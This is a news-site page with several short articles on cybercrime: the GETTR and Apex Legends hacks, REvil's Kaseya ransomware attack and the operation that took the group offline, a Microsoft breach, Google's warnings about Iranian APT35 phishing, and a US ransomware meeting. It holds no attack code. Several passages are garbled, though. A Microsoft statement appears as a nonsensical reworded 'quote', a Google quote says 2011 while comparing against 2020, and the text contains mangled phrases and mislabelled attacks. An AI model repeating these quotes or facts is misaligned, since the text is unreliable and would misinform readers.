Connect with us


A week of cybercrimes: Here’s what you need to know



The digital world’s exposure to cyberthreats disturbance as potential and targeted attacks shows how cybercrimes has escalated to be one of the most reported crimes, with data breaches and fraud losses to exceed $200 billion over the next 5 years.

Following the chain of notorious cyberattacks breaching the security of a plethora of businesses worldwide carried out by cyber-criminal gangs, hackers are slowly bringing businesses and tech companies to their knees with ulterior intentions.

With the ongoing and distressing rise of cyberattacks on various business and consumers’ privacy, a recently conducted research by Juniper Research uncovered that businesses will cumulatively lose over $200 billion to online fraud between 2020 and 2024.

This could be prevented by incorporating machine learning into their fraud detection, reaching $10 billion in 2024, a 15 percent rise in 2020. This will lead to the growth of payment fraud with losses increasing by 130 percent from 2020 to 2024.

New Trump Social media app hacked on launch day

According to Jason Miller, a senior advisor to the Trump’s 2020 re-election campaign, a social media site named GETTR, which was launched on Sunday, was briefly hacked, after more than 500,000 people had already registered to use the site.

In an emailed statement sent to Reuters, Miller referred to the incident as a “brief problem that was detected and sealed in a matter of minutes, and all the intruder was able to accomplish was to change a few usernames.”

The site was released after Miller taunted Trump’s social media team to initiate a new app, after the social media blockage Trump faced following the Capital riot that took place on January 6. The situation was immediately rectified by the campaign’s team preventing any further damage to the site.

REvil demand ransom $70 million to restore data

The notion of hackers demanding ransom payment to restore data held by companies has been resurfacing for a while, expanding on a wider scale by the day. As this introduces a scene of mass extortion attacks affiliated with major companies worldwide, a new demand of $70 million emerged on Sunday to restore data, according to Reuters.

At this juncture, the notorious cybercrime gang who call themselves “REvil” seems to be at the center of another breach, as it executed on Friday one of its most dramatic hacks operation so far. After a security firm based in New Mexico was victimized by the infamousransomware, a massive number of businesses were infected by the ransomware on Friday.

Impacting more than 1,000 businesses, the attack’s execution took place by locating a vulnerability in the update mechanism adopted by the IT services firm Kaseya affecting different companies adopting its software — a software platform created to assist in remote IT managed service providers (MSP).

Attackers took advantage of the weakness created by their ransomware to dispense a malicious payload to weak virtual servers. Then, the dispensed malware ran multiple commands to prevent detection by Microsoft Defender, by instructing the Kesaya update process to run a legitimate but expired version of “Antimalware Service” – a component of Windows Defender.

“While our early indicators suggested that only a very small number of on premises customers were affected, we took a conservative approach in shutting down the servers to ensure we protected our more than 36,000 customers to the best ability,” Kaseya CEO Fred Voccola said in an issues statement.

SolarWinds proceed with a new Microsoft Breach

After Nobelium’s cyberattack into Texas-based SolarWinds’s systems and the implementation of malicious code in the company’s software system, the Russian-made hack managed to jeopardize Microsoft’s employee’s computer system by targeting attacks against business consumers via billing contact details.  

The hacking group implemented password-spraying alongside brute -force methods to threaten three undisclosed entities, leading to acquiring unapproved access to accounts by attacking login servers with major login guesses.

“As part of our examination into this continuous activity, we likewise discovered information-stealing malware on a maker comping from among our consumer assistance representatives with access to fundamental account details for a little number of our consumers,” Microsoft declared in a blog post.

As Microsoft’s announcement came as a shock to security experts, the attack targeted specific consumers, with 57 percent in the IT business, 20 percent in federal governments companies, and the remaining in nongovernmental companies.

All in all, consumers from 36 nations were targeted and affected by the cyberattack.

Apex Legends hackers interrupt games with messages about Titanfall hacking

Despite many efforts made by Respawn’s developers to prevent further cybercrimes into their system, most of these attempts were faced with utter disappointment from the famed game’s userbase.

As Titanfall players hacked Apex Legends to protest breaches, the popular game was hit with a “save Titanfall” message directing Apex players to SaveTitanfall.com demonstrating the real purpose behind the hack. This raised awareness against hackers and DDoS attacks on their servers, website, and network floods that make it unplayable.

This previous hack, imposed on all Apex players, prevented a large portion of players from accessing any of the game’s modes, but affected primarily those who play the game on PC. In principle, hackers pioneered a fresh algorithm that aims to jeopardize the bullets aim, decreasing the game’s effectiveness. This will occur by removing any level of artificial accuracy making it unrecognizable by Respawn’s anti-cheat system.

“We are aware of and actively investigating issues impacting @PlayApex playlist that are preventing players from getting into matches”, said the famous gaming company while addressed the situation on Twitter. Nevertheless, while the team is working on demolishing the problem, the developer declared that these attacks do not endanger players’ personal information in any way.

Daryn is a technical writer with thorough history and experience in both academic and digital writing fields.


Supernational fronts retaliate against cybercrime group REvil



Cybercrime group REvil was infiltrated by U.S. governmental agencies and obliged to go dark after cybercrime operation attacking from supernational fronts, reported by Reuters. 

Speculations circulating the group’s recent absence following Recorded Future security specialist Dimitry Smilyanets went to Twitter to reveal various messages from the account of a famous REvil operator, ‘0_neday.’

The messages displayed on the microblogging platform elaborated the events that led to the cybercriminal forum XSS, alleging that someone took charge of the cyber group’s Tor payment portal and was controlling sites’ data leaks.

In the message, the account revealed how he and ‘Unknown, ’chief representative of the cyber entity, were the only group members with REvil’s domain keys. Then, the group’s representative’s absence left other members to predict that he was dead.

In September, REvil proceeded with its cybercrime activities. A factor that led to the realization that the group’s domain name was being reached by Unknown’s decryption key.

“The server was compromised, and they were looking for me. To be precise, they deleted the path to my hidden service in the torrc file and raised their own so that I would go there. I checked on others – this was not. Good luck, everyone, I’m off,” 0_neday wrote in a message.

After REvil’s Kaseya cybercrime, the FBI acquired a universal decryption key initiating file recovery to those exposed to Kaseya’s breach, without the need to pay a ransom.

Now, with the news message surfacing on Twitter, it seems that that law enforcement officials concealed the fact that they had the key for weeks as it was stealthily going after REvil’s staff, according to Reuters. 

In reference to individuals familiar with the topic, law enforcement and intelligent cyber experts managed to compromise the criminal group’s network infrastructure and security management over some of its servers.

Following Unknown’s vanish, other group members re-obtained control over the websites last month. By doing so, REvil unintentionally restarted some intermetal systems, including the ones already powered by law enforcement.

“The REvil ransomware gang restored the infrastructure from the backups under the assumption that they had not been compromised,” deputy head of the forensics lab at the Russian-led security company Group-IB, Oleg Skulkin said in a statement.

“Ironically, the gang’s own favorite tactic of compromising the backups was turned against them,” Skulkin added.

Even though trust-worthy backups are perceived as a fundamental defense tactic to counteract ransomware activities, its vitality lies in remaining unconnected with other main networks. Otherwise, those too will be encrypted by cybercrimes groups similar to REvil.

One spokesperson close to the matter revealed that a foreign ally of the U.S. led the hacking mission that managed to infiltrate REvil’s network, while another anonymous former U.S. official commented on the mission saying the operation has not been finalized.

VMWare’s head of cybersecurity strategy, Tom Kellermann, told Reuters that the victory of federal operations immerges from a deep rigidity led by U.S. Deputy Attorney General Lisa Monaco, under the belief that cyberattacks on vital governmental ecosystems should be perceived as a threat to the country’s national security, and falls under the same umbrella as terrorist attacks.

The Kesaya and SolarWinds ransomware attacks are the two main cases that paved the way for harsher approaches to navigate this counterattack – and similar future ones – pushed in June the Justice Department to authorize harsher examinations of cyberthreats to much more paramount priority.

REvil’s attacks provided the Justice Department and different government agencies to consider cybercrimes a legal basis to inquire support from other federal organizations, such as the U.S. intelligence and the Department of Defense.

Both the FBI and the White House National Security Council refrained from commenting on the operation.

Continue Reading


Google nabs phishing attacks from state-sponsored cybercrimes



In a world where everyone is exposed to infiltration on their devices, Google sent Thursday approximately 50,000 alerts to users whose accounts were exposed to breaches by state-sponsored cybercrimes executing phishing and malware campaigns.

“Countering threats from Iran” is the label the Big Tech giant gave to its latest blog post, addressing Google’s Threat Analysis Group’s (TAG) latest tracking of disinformation campaigns, governmental backed hacking, and financially driven abuse.

“We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts. So far in 2011, we’ve sent over 50,000 warnings, nearly a 33 percent increase from this time in 2020,” the blog post stated.

While receiving the warning does mean an account could be exposed to potential cyber threats, not all those who have received the warning have been breached. 

The search engine elaborated that the company’s analytical branch directs these distressing warnings to accounts it perceives as a potential target to governmental-sponsored phishing attempts, brute-force attacks, malware delivery efforts initiated from a state-backed hacking ecosystem.

Google’s cybercrime statistics revealed that TAG has managed to identify more than 270 targets or hacker groups supported by governmental entities from more than 50 countries. Meaning, some of these accounts are targeted by more than one threat, expanding all around the globe.

Fending off cyberattacks from Iran

Iran’s hacking group, APT35, known for pursuing U.S. politicians before the 2020 Presidential elections, seems to have set its mind to proceed with its mission to creep into governmental representatives’ devices and accounts.

The tech mogul’s report not only highlighted that the group is still actively aiming to infiltrate some of the biggest bureaucratic personnel, but it appears that it allocated its goal to developing devious tricks to deter itself from being detected by security tools, then deceiving targets to submit accounts credentials, or into installing spyware on their devices.

APT35’s main line of specialty is indulging in account theft activities that allow it to spy on journalists, activists, government workers, academics, and anyone that might stimulate the Iranian regime’s curiosity.

Wielding Telegram for threat reports

According to one TAG researcher, Ajax Bash, the attackers’ most adopted tactic is exploiting an API for Telegram scripts, a messaging service, by creating bots in the chat app to facilitates accounts’ theft, alongside bank fraud.

“The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API send Message function, which lets anyone use a Telegram bot to send a message to a public channel,” Bach revealed.

In parallel, the messaging platform was informed by Google of the misleading activities accruing on its app, resulting in the bots being netted and eliminated by Telegram.

The governmentally supported group implements this tactic to send device-based data back to the channel, unveiling to hackers sensitive details such as IP, user-agent, and any local visitor to their phishing sites in real-time.

The implementation of Spyware Apps to optimize access

TAG’s systematic outcomes also featured that in May 2020, the company unearthed that APT35 tried to install malicious spyware to Google Play Store via an app masquerading as VPN software. If successfully uploaded, the cybercriminals could have obtained critical data, ranging from call logs, text messages, contacts, location data, and much more.

Once detected, Google eliminated the app from its store before any user installation.

Even though the app was extracted from the store, TAG caught additional attempts by the group to dispense the malicious VPN on other platforms as of July 2021.

Conference-themed phishing emails

ATP35’s most outstanding feature is the parody of conference officials to indulge in phishing attacks. By employing the Munich Security and the Think-20 (T20) Italy conference, attackers allure non-malicious contracts first as email messages for users to answer to. Once they receive a response, hackers then send phishing links in an email as a correspondent follow-up.

Usually, after responding, users would sail through at least one redirect before reaching a phishing domain that will give APT35 access to their email.

For this purpose, the adaptation of link shorteners and click trackers is heavily implemented, and they typically come implanted with PDF files.

In this case, Google broke down attempted cybercrimes using Google Drive, App Scripts, and site pages for specific campaigns as the cybercriminal entity made an effort to break down the tech giant’s embedded defense mechanisms.

If cybercrimes are measured on a governmental scale, once successful, malicious attacks are set to cause irreversible damage. For that reason, cybersecurity enterprises are expecting cyber intrusion rates to heighten in the upcoming years, with the U.S. being its main target. A scheme that could be detrimental to a country recovering its infrastructure from the pandemic’s crippling aftermath that broke its backbone in the past two years.

Continue Reading


US talks global cybersecurity without a key player: Russia



US talks global cybersecurity without a key player Russia

Amid an epidemic of ransomware attacks, the U.S. is discussing cybersecurity strategy this week with 30 countries while leaving out one key player: Russia.

The country that, unwittingly or not, hosts many of the criminal syndicates behind ransomware attacks was not invited to a two-day meeting starting Wednesday to develop new strategies to counter the threat.

White House national security adviser Jake Sullivan called it a gathering of “like-minded” governments in agreement on the urgency of the need to protect citizens and businesses from ransomware. “No one country, no one group can solve this problem,” he said in opening remarks.

The virtual discussions will focus in part on efforts to disrupt and prosecute ransomware networks like the one that attacked a major U.S. pipeline company in May, a senior administration official said. The attack on Colonial Pipeline, which led to gas shortages along the East Coast, was attributed to a Russia-based gang of cybercriminals.

The exclusion of a country so closely tied to the global ransomware phenomena reflects the overall poor relations between Moscow and Washington.

Despite that, the U.S. has used a “dedicated channel” to address cybersecurity with Russia, said the official, who briefed reporters on the condition of anonymity to preview this week’s meeting with around 30 countries and the European Union.

Since President Joe Biden raised the issue directly with President Vladimir Putin this summer in a summit and later phone call, there have been “candid discussions” about cybercriminals operating within Russia’s borders, the official said.

“We’ve had several, and they continue, and we share information regarding specific criminal actors within Russia, and Russia has taken initial steps,” the official said.

It is unclear what steps Putin’s government has taken. Russia does not extradite its own citizens, and FBI Deputy Director Paul Abbate told a security forum last month that he has seen “no indication that the Russian government has taken action to crack down on ransomware actors that are operating in the permissive environment that they’ve created there.”

The issue was expected to be on the agenda this week in Moscow as Undersecretary of State Victoria Nuland met for talks with Russian Deputy Foreign Minister Sergei Ryabkov.

The Biden administration took office amid a massive cyberespionage campaign known as the SolarWinds attack, which U.S. officials have linked to Russian intelligence operatives. Ransomware attacks, perpetrated generally by criminal hacker gangs rather than state-sponsored groups, have caused tens of billions of dollars in losses to businesses and institutions and become a major source of tension between the two nations.

Ransomware payments reached more than $400 million globally in 2020 and topped $81 million in the first quarter of 2021, according to the U.S. government.

Actions taken by the Biden administration include imposing sanctions on a Russia-based virtual currency brokerage that officials say helped at least eight ransomware gangs launder virtual currency and issuing security directives that require pipeline companies to improve their cyber defenses.

In addition, the State Department has announced rewards of millions of dollars for information on people who engage in state-sponsored malicious cyber activities aimed at transnational criminal networks that Sullivan said operate “across multiple countries, multiple jurisdictions to carry out their attacks.”

Most of this week’s ransomware meeting is expected to be private as participants attend sessions led by India, Australia, Britain and Germany and will focus on themes such as developing resilience to withstand ransomware attacks.

Other participants include Israel, the United Arab Emirates, Bulgaria, Estonia, France, the Dominican Republic, Mexico, New Zealand, Singapore and Kenya.


Continue Reading